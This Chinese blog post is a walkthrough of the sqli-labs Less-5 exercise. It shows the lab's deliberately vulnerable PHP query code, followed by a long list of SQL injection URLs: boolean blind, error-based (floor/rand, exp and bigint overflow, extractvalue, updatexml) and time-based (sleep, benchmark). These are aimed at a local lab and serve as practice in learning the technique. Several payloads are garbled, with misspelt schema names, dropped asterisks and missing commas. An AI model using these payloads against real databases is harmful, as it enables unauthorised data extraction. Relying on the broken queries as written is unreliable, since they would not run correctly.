Less-5三种盲注小总结

2020-01-19  本文已影响0人  pigdaqiang

Less-5

简单的源码分析一下

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; //单引号闭合
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

//如果语句正确返回界面正常,否则返回错误.没有返回数据的地方

    if($row)
    {
    echo '<font size="5" color="#FFFF00">'; 
    echo 'You are in...........';
    echo "<br>";
        echo "</font>";
    }
    else 
    {
    
    echo '<font size="3" color="#FFFF00">';
    print_r(mysql_error());
    echo "</br></font>";    
    echo '<font color= "#0000ff" font size= 3>';    
    
    }
}
    else { echo "Please input the ID as parameter with numeric value";}

?>

利用函数逻辑来判断

注:以下都是利用二分法进行判断

判断数据库版本号第一位是否为5(已知版本号为5)

http://127.0.0.1/Less-5/index.php?id=1'and left(version(),1)=5--+//如果是则返回页面正确,否则页面错误

判断数据库长度

http://127.0.0.1/Less-5/index.php?id=1'and length(database())=8--+

判断数据库第一个字母是否大于a

http://127.0.0.1/Less-5/index.php?id=1' and left(database(),1)>'a'--+

判断数据库前二个字母

http://127.0.0.1/Less-5/index.php?id=1'and left(database(),2)>'sa'--+

利用substr()和ascii()进行注入

ascii(substr((select table_name from infromation_schema.tables where tables_schema=database() limit 0,1),1,1))=101

获取第二位字符直接substr(string,2,1)就好了

获取第二个表,直接limit 0,1 --> limit 1,1就好了

利用regexp来后去users表中的列

http://127.0.0.1/Less-5/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and table_name regexp '^us[a-z]' limit 0,1)-- +

选择users表中的列名是否有us**的列

http://127.0.0.1/Less-5/index.php?id=1' and 1=(select 1 from infromation_schema.columns where table_name='users' and column_name regexp'^username' limit 0,1)-- +

利用ord()和mid()函数

http://127.0.0.1/Less-5/index.php?id=1' and ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id limit 0,1)1,1))=68

报错注入

``http://127.0.0.1/Less-5/?id=1'union select 1,count(),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)2))a from information_schema.columns group by a --+`

double 数值类型超出范围

``http://127.0.0.1/Less-5/?id=1'union select (exp(~(select * from (select user())a))),2,3--+`

bigint 溢出报错

``http://127.0.0.1/Less-5/?id=1'union select (!(select * from (select user())x) - ~0),2,3--+`

xpath函数报错

``http://127.0.0.1/Less-5/?id=1'and extractvalue(1,concat(0x7e,(select @@version),0x7e))--+`

``http://127.0.0.1/Less-5/?id=1'and updatexml(1,concat(0x7e,(select @@version),0x7e),1)--+`

利用数据的重复性

``http://127.0.0.1/Less-5/?id=1'union select 1,2,3 from (select name const(version(),1),name const(version(),1))x--+`

延时注入

``http://127.0.0.1/Less-5/?id=1'and if(ascii(substr(database(),1,1))=115,1,sleep(5))--+`

错误的时候会有5秒的延迟

benchmark()延时

``http://127.0.0.1/Less-5/?id=1'union select (if(substring(current,1,1)=char(115),benchmark(50000000,encode('msg','by 5 seconds')),null)),2,3 from (select database()as current)as tb1--+`

当结果正确的时候,运行encode('msg','by 5 seconds')操作5000000次会占用一段时间

个人自建博客:
http://pigdaqiang.top

上一篇 下一篇

猜你喜欢

热点阅读